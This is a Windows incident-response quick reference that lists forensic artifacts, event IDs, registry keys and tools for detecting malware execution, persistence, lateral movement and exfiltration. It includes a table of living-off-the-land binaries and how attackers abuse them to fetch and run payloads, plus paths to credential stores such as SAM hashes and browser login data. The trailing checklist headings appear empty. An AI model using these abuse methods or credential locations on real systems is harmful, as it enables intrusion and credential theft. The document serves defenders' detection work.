DFIR Artifact Quick Reference
Audience: DFIR practitioners conducting Windows-centric incident response and forensic investigations.
Scope: Windows 10/11, Server 2016–2022 unless noted.
Legend: [EZ] = Eric Zimmerman tool | [TS] = Triaged from live system | [IMG] = Requires disk image
Table of Contents
- Execution Artifacts
- Persistence Mechanisms
- Account & Authentication Activity
- Lateral Movement Indicators
- File System & File Activity
- Network Activity
- Anti-Forensics & Defense Evasion
- Data Exfiltration Indicators
- Cloud & Browser Artifacts
- Key Event Log IDs Reference
- Critical Registry Keys Reference
- Recommended Toolchain
1. Execution Artifacts
Prefetch
| Property | Detail |
|---|
| Path | C:\Windows\Prefetch\*.pf |
| Exists on | Workstations (enabled by default); Servers (disabled by default) |
| Key Data | Executable name, run count, last 8 run timestamps, files/dirs referenced |
| Tool | PECmd.exe [EZ] |
| Investigative Value | Proves execution even if binary is deleted; timestamps survive binary removal |
| ATT&CK | T1204, T1059 |
Notes:
- Max 1024 entries (Win8+), FIFO eviction
- Hashes in filename are path + volume serial based — path changes = new hash
svchost.exe may have multiple prefetch files for different -k arguments
ShimCache (AppCompatCache)
| Property | Detail |
|---|
| Registry Path | HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache |
| Key Data | Executable path, last modified time of binary, executed flag (Win7 only) |
| Tool | AppCompatCacheParser.exe [EZ] |
| Investigative Value | Records executables Windows has seen, regardless of whether they ran (Win8+) |
| ATT&CK | T1036, T1059 |
Notes:
- Win8/10+: Presence does NOT confirm execution — only that the file existed and metadata was touched
- Cache is written to registry at shutdown — live acquisition may miss last session entries
- Volatile: reboot can flush uncommitted entries
AmCache
| Property | Detail |
|---|
| Path | C:\Windows\AppCompat\Programs\Amcache.hve |
| Key Data | Full path, SHA1 hash of binary, first execution time, install date, publisher |
| Tool | AmcacheParser.exe [EZ] |
| Investigative Value | SHA1 hash available without running the binary — pivot to VirusTotal immediately |
| ATT&CK | T1204, T1027 |
Notes:
- Hive is locked on live system — parse from VSS copy or offline image
- Both ProgramEntries and UnassociatedFileEntries are investigatively valuable
- SHA1 is of the PE header; truncated hashes common for large binaries
BAM / DAM (Background Activity Moderator)
| Property | Detail |
|---|
| Registry Path | HKLM\SYSTEM\CurrentControlSet\Services\bam\State\UserSettings\{SID} |
| Key Data | Executable path, last execution time (UTC) per user SID |
| Tool | Registry Explorer [EZ], reg query [TS] |
| Investigative Value | Confirms execution per-user with timestamps; survives binary deletion |
| ATT&CK | T1204, T1059 |
Notes:
- Windows 10 v1709+ only
- Entries persist across reboots
- Directly attributes execution to specific user accounts by SID
UserAssist
| Property | Detail |
|---|
| Registry Path | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count |
| Key Data | ROT-13 encoded executable names, run count, last run timestamp |
| Tool | Registry Explorer [EZ] |
| Investigative Value | GUI-launched application history with run count + last execution time per user |
| ATT&CK | T1204.002 |
Notes:
- ROT-13 decode required on all entries
- Only tracks GUI-launched executables (not CLI-launched)
- Two GUIDs present: UEME_RUNPATH and UEME_RUNPIDL
Jump Lists
| Property | Detail |
|---|
| Path | %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\ and CustomDestinations\ |
| Key Data | Recently opened files per application (AppID), timestamps, file paths |
| Tool | JLECmd.exe [EZ] |
| Investigative Value | Files opened via specific applications; persists after target file deletion |
| ATT&CK | T1204.002, T1566.001 |
2. Persistence Mechanisms
Run Keys
| Registry Path | Scope |
|---|
HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Current user, every logon |
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | Current user, once |
HKLM\Software\Microsoft\Windows\CurrentVersion\Run | All users, every logon |
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | All users, once |
Tool: Registry Explorer [EZ], Autoruns (Sysinternals) | ATT&CK: T1547.001
Scheduled Tasks
| Property | Detail |
|---|
| Path (XML) | C:\Windows\System32\Tasks\ |
| Registry Path | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks |
| Key Data | Task name, triggers, actions (command + args), author, creation/modification times |
| Tool | SchtasksParser.exe [EZ], manual XML review |
| Event IDs | 4698 (Created), 4702 (Updated), 4700/4701 (Enabled/Disabled) |
| ATT&CK | T1053.005 |
Notes:
- Deleted task XML may persist in registry under TaskCache
- Compare filesystem vs. registry — discrepancy indicates tampering
- Action fields often expose full command line including LOLBin abuse
Services
| Property | Detail |
|---|
| Registry Path | HKLM\SYSTEM\CurrentControlSet\Services\ |
| Key Data | ImagePath, Start type, DisplayName, Description |
| Event IDs | 7045 (New Service), 7034/7035/7036 (State changes) |
| Tool | Registry Explorer [EZ], sc query [TS] |
| ATT&CK | T1543.003 |
Notes:
ImagePath pointing to Temp, AppData, or ProgramData = high suspicion- Services with no Description or generic names are a common malware indicator
WMI Subscriptions
| Property | Detail |
|---|
| Path | C:\Windows\System32\wbem\Repository\ |
| Key Data | EventFilter, EventConsumer, FilterToConsumerBinding |
| Tool | PyWMIPersistenceFinder.py, WMI Explorer |
| ATT&CK | T1546.003 |
Notes:
- No binary on disk required (script consumer) — extremely stealthy
- Repository is binary format requiring specialized tooling
- Check for CommandLineEventConsumer and ActiveScriptEventConsumer types
Startup Folders
| Path | Scope |
|---|
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ | Current user |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ | All users |
ATT&CK: T1547.001
3. Account & Authentication Activity
Key Security Event IDs
| Event ID | Description | Log |
|---|
| 4624 | Successful logon | Security |
| 4625 | Failed logon | Security |
| 4634 / 4647 | Logoff | Security |
| 4648 | Explicit credential logon (RunAs, PTH indicator) | Security |
| 4672 | Special privileges assigned (admin logon) | Security |
| 4720 | User account created | Security |
| 4726 | User account deleted | Security |
| 4728 / 4732 / 4756 | Member added to security/local/universal group | Security |
| 4771 | Kerberos pre-auth failed | Security (DC) |
| 4776 | NTLM auth attempt | Security (DC) |
| 4768 | TGT requested | Security (DC) |
| 4769 | Service ticket requested | Security (DC) |
Logon Type Reference
| Type | Description | Attack Relevance |
|---|
| 2 | Interactive (console) | Local access |
| 3 | Network | SMB, net use, lateral movement |
| 4 | Batch | Scheduled task execution |
| 5 | Service | Service account logon |
| 7 | Unlock | Workstation unlock |
| 8 | NetworkCleartext | WinRM, IIS basic auth — credential exposure risk |
| 9 | NewCredentials | RunAs /netonly — PTH indicator |
| 10 | RemoteInteractive | RDP |
| 11 | CachedInteractive | Offline / cached credential use |
SAM Database
| Property | Detail |
|---|
| Path | C:\Windows\System32\config\SAM |
| Key Data | Local accounts, NTLM hashes, account flags, last logon |
| Tool | Registry Explorer [EZ] with SYSTEM hive for decryption |
| ATT&CK | T1003.002 |
4. Lateral Movement Indicators
RDP
| Artifact | Location | Key Data |
|---|
| Event ID 4624 (Type 10) | Security.evtx | Source IP, username |
| Event ID 1149 | TerminalServices-RemoteConnectionManager%4Operational.evtx | Source IP, username (pre-auth) |
| Event ID 21, 25 | TerminalServices-LocalSessionManager%4Operational.evtx | Session logon/reconnect |
| Bitmap Cache | %LOCALAPPDATA%\Microsoft\Terminal Server Client\Cache\ | Pixel fragments of remote session |
| MRU Registry | HKCU\Software\Microsoft\Terminal Server Client\Default | Recently connected RDP hosts |
| Artifact | Location | Key Data |
|---|
| Event ID 4624 (Type 3) | Security.evtx | Network logon from remote host |
| Event ID 5140 | Security.evtx | Network share accessed |
| Event ID 5145 | Security.evtx | Share object access check |
| Named Pipes | Sysmon Event ID 17/18 | PsExec, Cobalt Strike SMB beacons |
PsExec
| Artifact | Location |
|---|
| Service creation | System.evtx Event ID 7045 (PSEXESVC) |
| Prefetch | PSEXESVC.EXE-*.pf on target host |
| Registry | HKLM\SYSTEM\CurrentControlSet\Services\PSEXESVC |
| Sequential logon events | Event ID 4624 Type 3 followed by Type 2, same source |
WMI Remote Execution
| Artifact | Location | Key Data |
|---|
| Event ID 4624 Type 3 | Security.evtx | Source IP |
| WMI Activity Log | Microsoft-Windows-WMI-Activity%4Operational.evtx | Process creation, query execution |
| Sysmon Event ID 19/20/21 | Sysmon.evtx | Filter/consumer activity |
wmiprvse.exe child processes | Prefetch, Sysmon Event ID 1 | Spawned command execution |
Pass-the-Hash / Pass-the-Ticket Indicators
| Indicator | Detail |
|---|
| Event ID 4624 Logon Type 9 | NewCredentials — explicit credential use |
| Event ID 4648 | Logon with explicit credentials |
| Event ID 4769 with RC4 encryption | Downgrade attack / Kerberoasting indicator |
| Source workstation mismatch | Lateral movement pivot |
| Event ID 4769 from non-domain-joined host | Golden/Silver Ticket activity |
5. File System & File Activity
MFT (Master File Table)
| Property | Detail |
|---|
| Path | $MFT at NTFS volume root |
| Key Data | All file metadata: $STANDARD_INFO and $FILE_NAME timestamps, size, parent directory |
| Tool | MFTECmd.exe [EZ] |
| Investigative Value | Timestomping detection; file recovery; full volume enumeration |
| ATT&CK | T1070.006 |
Timestomping Detection:
$STANDARD_INFORMATION ($SI) timestamps are user-modifiable via API$FILE_NAME ($FN) timestamps are kernel-set — much harder to manipulate$SI Creation time AFTER $FN Creation time = strong timestomping indicator$SI with no subsecond precision = likely set by an external tool, not Windows
LNK Files (Shortcut Files)
| Property | Detail |
|---|
| Path | %APPDATA%\Microsoft\Windows\Recent\ |
| Key Data | Target file path, target MAC times, volume serial, machine ID, NetBIOS name |
| Tool | LECmd.exe [EZ] |
| Investigative Value | Proves file was opened; machine ID links artifact to specific host; persists after target deletion |
| ATT&CK | T1547.009 |
Shellbags
| Property | Detail |
|---|
| Registry Path | HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU |
| Key Data | Folder paths browsed via Explorer, timestamps, network paths, removable media paths |
| Tool | SBECmd.exe [EZ] |
| Investigative Value | Proves user navigated a directory even if it no longer exists; tracks removable media access |
| ATT&CK | T1025, T1074 |
Volume Shadow Copies
| Property | Detail |
|---|
| Command | vssadmin list shadows [TS] |
| Investigative Value | Access historical versions of locked files: SAM, NTDS.dit, registry hives |
| Tool | vshadow.exe, Arsenal Image Mounter |
| ATT&CK | T1490 — VSS deletion = ransomware precursor indicator |
$LogFile and $UsnJrnl
| Artifact | Detail |
|---|
| $LogFile | NTFS transaction log — recent file operations; useful for post-deletion recovery |
| $UsnJrnl:$J | Change journal — all create/modify/delete/rename ops with timestamps |
| Tool | MFTECmd.exe [EZ] for $J; fsutil usn [TS] |
| Investigative Value | Rename chains (unpacking activity), staging evidence, deleted file confirmation |
6. Network Activity
DNS Cache (Live)
| Property | Detail |
|---|
| Command | ipconfig /displaydns [TS] |
| Key Data | Recently resolved hostnames and IPs |
| Investigative Value | C2 domain resolution evidence — volatile, lost on flush/reboot |
Active Connections (Live)
| Command | Output |
|---|
netstat -anob | Connections with PID and binary name |
Get-NetTCPConnection | PowerShell equivalent with richer output |
Windows Firewall Logs
| Property | Detail |
|---|
| Path | C:\Windows\System32\LogFiles\Firewall\pfirewall.log |
| Key Data | Allow/drop, source/dest IP, port, protocol, direction |
| Investigative Value | Egress traffic patterns, port scanning, lateral movement paths |
Sysmon Network Events
| Event ID | Description |
|---|
| 3 | Network connection (process, src/dst IP/port, DNS name if resolved) |
| 22 | DNS query (process + queried domain) |
PCAP Behavioral Indicators
| Pattern | Indicator |
|---|
| Regular beaconing (low jitter intervals) | C2 heartbeat |
| DNS queries with high-entropy subdomains | DNS tunneling (C2 or exfil) |
| Large outbound transfers during off-hours | Data exfiltration |
| JA3/JA3S fingerprint mismatch for known app | Malware using TLS |
| HTTP POST to bare IP address (no domain) | C2 over HTTP |
| Long-duration low-bandwidth sessions | Interactive C2 |
| Abnormal User-Agent strings | Malware HTTP C2 |
7. Anti-Forensics & Defense Evasion
Event Log Clearing
| Indicator | Detail |
|---|
| Event ID 1102 | Security log cleared |
| Event ID 104 | System log cleared |
| Log timestamp gaps | Selective event deletion |
| Sysmon Event ID 255 | Sysmon service error (tamper indicator) |
| ATT&CK | T1070.001 |
Timestomping
| Indicator | Detail |
|---|
$SI vs $FN creation time discrepancy | MFT parsing required |
| PE compile timestamp at epoch or future date | PEStudio, exiftool analysis |
| ATT&CK | T1070.006 |
File Deletion & Recycle Bin
| Artifact | Detail |
|---|
$I + $R file pairs | $I = metadata (original path, deletion time, file size); $R = content |
| Path | C:\$Recycle.Bin\{SID}\ |
| Tool | RBCmd.exe [EZ] |
| ATT&CK | T1070.004 |
LOLBin (Living Off the Land Binary) Reference
| Binary | Common Abuse Method |
|---|
certutil.exe | Download files, base64 decode payloads |
mshta.exe | Execute remote HTA scripts |
regsvr32.exe | Squiblydoo — execute remote scriptlets (bypass AppLocker) |
rundll32.exe | Execute arbitrary DLL exports |
wscript.exe / cscript.exe | Execute VBScript/JScript payloads |
powershell.exe | Download cradles, reflective PE loading, AMSI bypass |
msiexec.exe | Execute remote MSI packages |
bitsadmin.exe | File download, persistence via BITS jobs |
wmic.exe | Remote process creation, lateral movement |
msbuild.exe | Execute inline C# — fileless execution |
Detection: Prefetch entries, Sysmon Event ID 1, Event ID 4688 (with command-line logging enabled)
8. Data Exfiltration Indicators
Staging Activity
| Artifact | Detail |
|---|
| Shellbags | Browsing to unusual network shares or external drives |
| $UsnJrnl | Mass file operations (bulk creates/renames in short window) |
| Prefetch | Compression tool execution (rar.exe, 7z.exe, zip.exe) |
| LNK files | Target paths pointing to archive staging directories |
| ATT&CK | T1074.001 |
| Indicator | Detail |
|---|
| Prefetch entries | WinRAR, 7-Zip, tar, compress executions with timestamps |
| AmCache SHA1 | Hash of compression utility for VT lookup |
| Command-line args | -p (password protection), split archive switches |
| ATT&CK | T1560.001 |
Rclone / Cloud Exfiltration
| Indicator | Detail |
|---|
| Prefetch | rclone.exe execution |
| BAM/DAM | rclone.exe per-user last execution timestamp |
| Config file | %APPDATA%\rclone\rclone.conf — cloud provider credentials stored in plaintext |
| Sysmon Event ID 3 | Outbound connections to cloud storage API endpoints |
| ATT&CK | T1567.002 |
9. Cloud & Browser Artifacts
Browser History & Downloads
| Browser | Artifact Path |
|---|
| Chrome | %LOCALAPPDATA%\Google\Chrome\User Data\Default\History (SQLite) |
| Edge | %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\History (SQLite) |
| Firefox | %APPDATA%\Mozilla\Firefox\Profiles\*.default\places.sqlite |
| Tool | Hindsight (Chrome), DB Browser for SQLite |
| Key Data | URLs visited, download file paths + timestamps, search terms |
Browser Credentials & Cookies
| Artifact | Path |
|---|
| Chrome Cookies | %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies |
| Chrome Login Data | %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data |
| ATT&CK | T1539 (Session Cookie Theft), T1555.003 |
OneDrive Sync Artifacts
| Artifact | Path |
|---|
| Sync logs | %LOCALAPPDATA%\Microsoft\OneDrive\logs\ |
| Settings/DB | %LOCALAPPDATA%\Microsoft\OneDrive\settings\ |
| Key Data | Files synced to cloud, timestamps, account UPN |
10. Key Event Log IDs Reference
Event Log Locations
| Log | Path |
|---|
| Security | C:\Windows\System32\winevt\Logs\Security.evtx |
| System | C:\Windows\System32\winevt\Logs\System.evtx |
| Application | C:\Windows\System32\winevt\Logs\Application.evtx |
| Sysmon | C:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx |
| PowerShell | C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx |
| TaskScheduler | C:\Windows\System32\winevt\Logs\Microsoft-Windows-TaskScheduler%4Operational.evtx |
Process Execution
| Event ID | Log | Description |
|---|
| 4688 | Security | Process created (requires audit policy + CLI logging enabled) |
| 1 | Sysmon | Process created (hash, PPID, full command line) |
| 5 | Sysmon | Process terminated |
| 400/403 | PowerShell | Engine state change |
| 4103 | PowerShell Operational | Module logging |
| 4104 | PowerShell Operational | Script block logging (includes decoded content) |
Object Access
| Event ID | Log | Description |
|---|
| 4663 | Security | Object access attempt |
| 4656 | Security | Handle to object requested |
| 11 | Sysmon | File created |
| 23 | Sysmon | File deleted (archived to Sysmon archive path) |
Network
| Event ID | Log | Description |
|---|
| 3 | Sysmon | Network connection initiated |
| 22 | Sysmon | DNS query |
| 5156 | Security | WFP: connection allowed |
| 5157 | Security | WFP: connection blocked |
Registry
| Event ID | Log | Description |
|---|
| 13 | Sysmon | Registry value set |
| 14 | Sysmon | Registry key/value renamed |
| 4657 | Security | Registry value modified |
11. Critical Registry Keys Reference
| Key | Value |
|---|
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | OS version, build number, install date |
HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName | Hostname |
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces | Network interface config |
HKLM\SYSTEM\MountedDevices | Mounted volumes and drive letters |
Evidence of Execution
| Key | Notes |
|---|
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist | GUI execution (ROT-13 encoded) |
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache | ShimCache |
HKCU\Software\Microsoft\Windows\Shell\MuiCache | Binary friendly name cache |
HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store | Compat flags set at execution |
User Activity
| Key | Notes |
|---|
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs | Recently opened files by extension |
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU | Files opened/saved via common dialog |
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU | Commands typed into the Run box |
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths | Paths typed directly in Explorer |
Network & Remote Access
| Key | Notes |
|---|
HKCU\Software\Microsoft\Terminal Server Client\Default | RDP connection history (target hostnames) |
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles | Network profiles with connection timestamps |
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures | Network GUIDs to profile mapping |
Acquisition
| Tool | Use Case |
|---|
| KAPE | Targeted triage collection — configurable targets and modules |
| FTK Imager | Full disk image, memory capture, logical acquisition |
| WinPmem / Magnet RAM Capture | Live memory acquisition |
| Velociraptor | Enterprise-scale remote artifact collection |
| CyLR | Lightweight live response artifact collection |
Parsing & Analysis
| Tool | Artifacts Covered |
|---|
| Eric Zimmerman Tools | MFT, Prefetch, ShimCache, AmCache, JumpLists, LNK, Registry, Shellbags, $UsnJrnl, Recycle Bin |
| Registry Explorer | All registry hives — full browsing with transaction log integration |
| Volatility3 | Memory forensics — processes, network, injections, malfind |
| Autopsy / FTK | Full case management, file recovery, keyword search |
| Wireshark / NetworkMiner | PCAP analysis, stream reconstruction |
| Hayabusa | Rapid Windows Event Log threat hunting (Sigma-based) |
| Chainsaw | Fast Event Log triage and hunting |
| FLOSS | Automated string extraction from malware |
| PEStudio | Static PE analysis — imports, strings, VT lookup |
| Hindsight | Chrome/Chromium browser artifact parsing |
Quick Investigation Checklists
Suspected Malware Execution
Suspected Lateral Movement
Suspected Exfiltration
Suspected Persistence
Last updated: 2026 | Maintained for sdp4n6.dev | Coverage: Windows 10/11, Server 2016–2022